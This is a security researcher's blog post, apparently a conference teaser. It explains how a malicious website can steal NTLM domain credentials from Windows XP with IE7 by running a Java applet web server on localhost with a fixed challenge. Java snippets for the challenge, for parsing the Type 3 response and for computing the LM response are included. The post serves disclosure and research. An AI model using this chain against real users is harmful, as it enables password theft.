Consider for a moment the state of client-side bugs 5 or 6 years ago. Attacks such as this, a multi-stage miscellany of IE and Mediaplayer bugs that resulted in the "silent delivery and installation of an executable on the target computer, no client input other than viewing a web page", were reported with regularity. Gradually these types of attack gave way to exploitation of direct browser implementation flaws such as the IFRAME overflow and DHTML memory corruption flaws. So what has become of the multi-stage attacks? Have they become redundant? The answer, which I'm sure you can guess, is a resounding "no", as will be emphatically demonstrated in my upcoming Black Hat talk "The Internet is Broken: Beyond Document.Cookie - Extreme Client Side Exploitation", a joint double session co-presented with Billy Rios, Nate McFeters and Rob Carter.

As a teaser for that, I'm going to revisit an old attack - pre-computed dictionary attacks on NTLM - and discuss how we can steal domain credentials from the Internet with a bit of help from Java. I'm going to split it into two posts. In this post we'll apply the attack to Windows XP (a fully patched SP3 with IE7). In my next post we'll consider its impact on Windows Vista.

NTLM Fun and Games

The weaknesses of NTLM have long been understood (and documented and presented) so I'm not going to cover them in detail here. For the interested reader I recommend this L0phtCrack Technical Rant and Jesse Burns's presentation from SyScan 2004, NTLM Authentication Unsafe. The pre-computed dictionary attack on NTLM that we are interested in has also already been implemented in tools such as PokeHashBall. In a nutshell, this attack works as follows:

- Position yourself on the Intranet.

- Coerce a client, either actively or passively, into connecting to a service (such as SMB or a web server) on your machine.

- Request authentication and supply a pre-selected challenge.

- Capture the hashes from the NTLM type 3 message and crack them using rainbow tables or brute force.

A requirement of this attack is for the attacker to be located on the Intranet. There have been suggestions on how to remove this necessity; see this post for a discussion on DNS rebinding as a potential solution. Let's take a step back though and begin by reviewing IE's criteria for determining whether a site is located on the Intranet or the Internet:

By default, the Local Intranet zone contains all network connections that were established by using a Universal Naming Convention (UNC) path, and Web sites that bypass the proxy server or have names that do not include periods (for example, http://local), as long as they are not assigned to either the Restricted Sites or Trusted Sites zone


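To make the "names that do not include periods" rule concrete, here is a minimal sketch of that single check. The class and method names are hypothetical, and this is not IE's actual zone logic; it ignores the UNC, proxy bypass and Restricted/Trusted Sites parts of the rule quoted above.

```java
import java.net.URI;

final class IntranetNameRule {
    // Hypothetical helper: true when the URL's host contains no period.
    // This models only ONE of the Local Intranet criteria quoted above.
    static boolean hasDotlessHost(String url) {
        String host = URI.create(url).getHost();
        return host != null && !host.isEmpty() && host.indexOf('.') < 0;
    }

    public static void main(String[] args) {
        System.out.println(hasDotlessHost("http://localhost:8080/"));
        System.out.println(hasDotlessHost("http://127.0.0.1:8080/"));
        System.out.println(hasDotlessHost("http://www.example.com/"));
    }
}
```

Under this rule alone, http://localhost qualifies while http://127.0.0.1 does not, since the dotted address contains periods.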

Let's focus on names that do not include periods. As Rob Carter has pointed out, there are more than a few home/corporate products that install web servers bound to localhost, and since http://localhost meets the above criteria, XSS in these products lets us control content in the Local Intranet Zone. If we were therefore able to fully control a web server on the local machine, headers and all, and we were able to cause IE to connect to it, we could ask IE to authenticate, allowing us to use a pre-selected challenge in order to carry out a pre-computed dictionary attack. But how does a malicious website run a web server on your machine? This is where the Java browser plugin comes into play...

A Web Server in Java

There is nothing to stop an unsigned Java applet from binding a port provided the port number is greater than 1024. The same origin policy, which I've discussed previously, is enforced when the applet calls accept() to take a connection from a client; only the host from which the applet was loaded is allowed to connect to the port. If a different host connects, a security exception is thrown, as shown below.

This means that if we can make the applet think it was loaded from localhost, we can bind a port and act as a web server, serving requests originating from localhost. I have previously covered two ways of manipulating the applet codebase (the verbatim protocol handler and defeating the same origin policy), but these flaws are now patched. We can accomplish the same effect on the most recent Java browser plugin by forcing content to be cached in a known location on the file system and by referencing it using the file:// protocol handler*. So if we know that our class was stored at c:\test.class for example, we could load it via the following APPLET tag (the default directory is the desktop hence the ..\..\..\):

<APPLET code="test" codebase="file:..\..\..\"></APPLET>

The result of loading content from the local machine is that a SocketPermission is added allowing the applet to bind a port and accept connections from localhost.

So this attack effectively boils down to caching content in a known location. The Java applet caching mechanism stores content at %UserProfile%\Application Data\Sun\Java\Deployment\cache (or equivalent under Protected Mode on Vista). Class files and JARs are given randomly generated names (and that's SecureRandom before you ask). There are, however, multiple ways of silently getting content onto the local machine with a fixed name. And that's all I'm going to say for now; we'll be addressing this topic further in our Black Hat talk :)

The Windows Firewall

What about the Windows firewall, you may ask? The trick is to make sure we bind to 127.0.0.1 only, as doing so will not trigger a security dialog. This is accomplished in Java as follows:

ServerSocket ss = new ServerSocket(port, 0, InetAddress.getByName("127.0.0.1"));

Actually, it turns out that on Vista, in order for our web server applet to work at all, we must call the ServerSocket(int port, int backlog, InetAddress bindAddr) constructor anyway rather than simply ServerSocket(int port). Calling ServerSocket(int port) will bind using IPv6 as well as IPv4; when we then point IE to http://localhost, it will connect to the IPv6 endpoint and throw the following exception:

The reason for this is that the Java code adds a SocketPermission for 127.0.0.1 which is obviously IPv4 only.
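The IPv4-only behaviour can be illustrated with java.net.SocketPermission itself. This is a sketch under assumptions: the exact permission string the plugin adds is not given here, so the "127.0.0.1:1024-" target and "accept,listen" actions below are guesses chosen to match the description, and the class name is hypothetical.

```java
import java.net.SocketPermission;

final class LoopbackPermissionCheck {
    // ASSUMED shape of the permission granted to an applet loaded from the
    // local file system; only "a SocketPermission for 127.0.0.1" is known.
    static final SocketPermission GRANTED =
            new SocketPermission("127.0.0.1:1024-", "accept,listen");

    // Would the assumed grant allow accepting a connection from this peer?
    // Pass IP literals only, so that no name resolution is involved.
    static boolean allowsAcceptFrom(String hostAndPort) {
        return GRANTED.implies(new SocketPermission(hostAndPort, "accept"));
    }

    public static void main(String[] args) {
        System.out.println("IPv4 loopback: " + allowsAcceptFrom("127.0.0.1:8080"));
        System.out.println("IPv6 loopback: " + allowsAcceptFrom("[::1]:8080"));
    }
}
```

A peer arriving from the IPv6 loopback address is not covered by a permission written for 127.0.0.1, which is consistent with the exception seen when the socket is bound on both stacks.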

Putting it all together

The code for the web server applet is very simple. We needn't implement a full, multi-threaded web server; all we really need to do is send an HTTP/1.1 401 status code with a WWW-Authenticate header of NTLM in response to IE's first request. This will trigger the NTLM exchange of base-64 encoded messages. Since NTLM authenticates connections rather than individual requests, we must remember to send a Content-Length header (even if there's no content, i.e. Content-Length: 0) to ensure the connection stays open. There are several resources out there that provide detailed NTLM specs and examples. I used this one.
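The two responses described above can be sketched as follows. This is not the PoC code: the class and method names are hypothetical, the Type 2 message is the smallest layout I know of (signature, type, empty target name buffer, flags, challenge), and whether a particular IE build accepts exactly these flags is an assumption. The challenge 1122334455667788 in main is only an illustrative value.

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

final class NtlmChallengeResponses {
    // Reply to the first request: ask for NTLM and keep the connection open.
    static String initial401() {
        return "HTTP/1.1 401 Unauthorized\r\n"
             + "WWW-Authenticate: NTLM\r\n"
             + "Content-Length: 0\r\n"
             + "\r\n";
    }

    // Minimal 32-byte Type 2 message carrying our pre-selected challenge.
    static byte[] type2Message(byte[] challenge) {
        if (challenge.length != 8) {
            throw new IllegalArgumentException("challenge must be 8 bytes");
        }
        ByteBuffer buf = ByteBuffer.allocate(32).order(ByteOrder.LITTLE_ENDIAN);
        buf.put("NTLMSSP\0".getBytes(StandardCharsets.US_ASCII)); // signature
        buf.putInt(2);           // message type
        buf.putShort((short) 0); // target name: length
        buf.putShort((short) 0); // target name: allocated space
        buf.putInt(0);           // target name: offset
        buf.putInt(0x00000202);  // flags: Negotiate OEM | Negotiate NTLM
        buf.put(challenge);      // the fixed server challenge
        return buf.array();
    }

    // Reply to the client's Type 1 message with our Type 2 message.
    static String challenge401(byte[] challenge) {
        String b64 = Base64.getEncoder().encodeToString(type2Message(challenge));
        return "HTTP/1.1 401 Unauthorized\r\n"
             + "WWW-Authenticate: NTLM " + b64 + "\r\n"
             + "Content-Length: 0\r\n"
             + "\r\n";
    }

    public static void main(String[] args) {
        byte[] challenge = {0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, (byte) 0x88};
        System.out.print(initial401());
        System.out.print(challenge401(challenge));
    }
}
```

Because the challenge is fixed by the server rather than random, every response captured this way can be checked against the same pre-computed table.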

The HTML page that we use to tie the attack together consists of multiple hidden IFRAMEs: firstly to load the Java browser plugin and cache the content, then to launch the web server applet from file://, then to make a request to http://localhost. For my PoC I created a 2nd applet to display the progress of the attack and to allow me to easily copy and paste the hashes out of the browser; a sample capture is shown below. Obviously in a real attack we'd want to ship the hashes off the victim's box either via JavaScript or Java.
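For reference, the values worth capturing sit at fixed descriptor offsets in the Type 3 message that IE sends back in its Authorization header. The following is a rough sketch of pulling them out, not the PoC applet: the class name is hypothetical, the offsets follow the commonly documented NTLM Type 3 layout, and the caller must supply the charset for the names (OEM or UTF-16LE depending on the negotiated flags).

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Base64;

final class NtlmType3Fields {
    final byte[] lmResponse;
    final byte[] ntResponse;
    final String domain;
    final String user;

    private NtlmType3Fields(byte[] lm, byte[] nt, String domain, String user) {
        this.lmResponse = lm;
        this.ntResponse = nt;
        this.domain = domain;
        this.user = user;
    }

    // headerValue is the Authorization header value: "NTLM <base64>".
    static NtlmType3Fields parse(String headerValue, Charset nameCharset) {
        String value = headerValue.trim();
        if (!value.startsWith("NTLM ")) {
            throw new IllegalArgumentException("not an NTLM header");
        }
        byte[] raw = Base64.getDecoder().decode(value.substring(5).trim());
        byte[] signature = "NTLMSSP\0".getBytes(StandardCharsets.US_ASCII);
        ByteBuffer msg = ByteBuffer.wrap(raw).order(ByteOrder.LITTLE_ENDIAN);
        if (raw.length < 52
                || !Arrays.equals(Arrays.copyOf(raw, 8), signature)
                || msg.getInt(8) != 3) {
            throw new IllegalArgumentException("not a Type 3 message");
        }
        // Security buffer descriptors: LM at 12, NTLM at 20, domain at 28, user at 36.
        return new NtlmType3Fields(
                readBuffer(msg, raw, 12),
                readBuffer(msg, raw, 20),
                new String(readBuffer(msg, raw, 28), nameCharset),
                new String(readBuffer(msg, raw, 36), nameCharset));
    }

    // A descriptor is: uint16 length, uint16 allocated, uint32 offset (little endian).
    private static byte[] readBuffer(ByteBuffer msg, byte[] raw, int descriptorAt) {
        int length = msg.getShort(descriptorAt) & 0xFFFF;
        int offset = msg.getInt(descriptorAt + 4);
        if (offset < 0 || offset > raw.length - length) {
            throw new IllegalArgumentException("security buffer out of range");
        }
        return Arrays.copyOfRange(raw, offset, offset + length);
    }
}
```

A caller would pass the header value straight from the request, for example NtlmType3Fields.parse(authorizationValue, StandardCharsets.UTF_16LE), and then hex-encode lmResponse and ntResponse for the cracking tool.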

Once we have the hashes, we can use rainbow tables to crack the first 7 characters of the LM response or brute force via a password cracker that can handle captured NTLM exchanges, such as John the Ripper with this patch. We can then brute force the remainder of the password. For anyone interested in the approaches to cracking NTLM, I recommend warlord's Uninformed paper, Attacking NTLM with Precomputed Hashtables.
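Why a fixed challenge makes the first 7 characters fall to a table can be seen from how the LM response is built. The sketch below follows the commonly documented LM hash and LM response construction; the class and method names are hypothetical, and passwords are treated as ASCII for simplicity (the real algorithm uses the OEM code page).

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.util.Arrays;
import java.util.Locale;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

final class LmResponseSketch {
    // Spread 7 bytes (56 key bits) over 8 bytes, 7 bits per byte.
    // The low (parity) bit of each byte is left at 0.
    static byte[] desKeyFrom7(byte[] src, int off) {
        long bits = 0;
        for (int i = 0; i < 7; i++) {
            bits = (bits << 8) | (src[off + i] & 0xFF);
        }
        byte[] key = new byte[8];
        for (int i = 0; i < 8; i++) {
            key[i] = (byte) (((bits >>> (49 - 7 * i)) & 0x7F) << 1);
        }
        return key;
    }

    // DES-encrypt one 8-byte block with the 7 key bytes found at src[off..off+6].
    static byte[] desEncrypt(byte[] src, int off, byte[] block8) {
        try {
            Cipher des = Cipher.getInstance("DES/ECB/NoPadding");
            des.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(desKeyFrom7(src, off), "DES"));
            return des.doFinal(block8);
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    // LM hash: uppercase, pad or truncate to 14 bytes, two independent 7-byte halves.
    static byte[] lmHash(String password) {
        byte[] pw = Arrays.copyOf(
                password.toUpperCase(Locale.ROOT).getBytes(StandardCharsets.US_ASCII), 14);
        byte[] magic = "KGS!@#$%".getBytes(StandardCharsets.US_ASCII);
        byte[] hash = new byte[16];
        System.arraycopy(desEncrypt(pw, 0, magic), 0, hash, 0, 8);
        System.arraycopy(desEncrypt(pw, 7, magic), 0, hash, 8, 8);
        return hash;
    }

    // LM response: pad the hash to 21 bytes, use it as three DES keys on the challenge.
    static byte[] lmResponse(byte[] lmHash, byte[] challenge8) {
        byte[] padded = Arrays.copyOf(lmHash, 21);
        byte[] response = new byte[24];
        for (int i = 0; i < 3; i++) {
            System.arraycopy(desEncrypt(padded, 7 * i, challenge8), 0, response, 8 * i, 8);
        }
        return response;
    }
}
```

The first 8-byte block of the response is keyed only by the first 7 bytes of the LM hash, which in turn depend only on the first 7 characters of the uppercased password. With the challenge fixed in advance, that block can be looked up in a table built once and reused for every victim.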

Summary

So to summarise the above, if a user on a domain-joined XP machine with the Java browser plugin visits a malicious website with IE, the malicious website can steal their username, domain name and a challenge-response pair in order to carry out a pre-computed dictionary attack, likely revealing the user's password in a short time.

Once again, this is not a new attack - there are a good many tools that implement the well-known NTLM attacks, such as SMBRelay, ScoopLM and Cain & Abel. The delivery and execution of this attack, however, demonstrates that multi-stage client-side attacks are alive and well...

That's it for now. Next time we'll consider how this attack applies to Vista, which enforces the more secure NTLMv2 by default.

Cheers

John

*Note that unlike Flash, Java implements its own protocol handlers rather than relying on the browser's.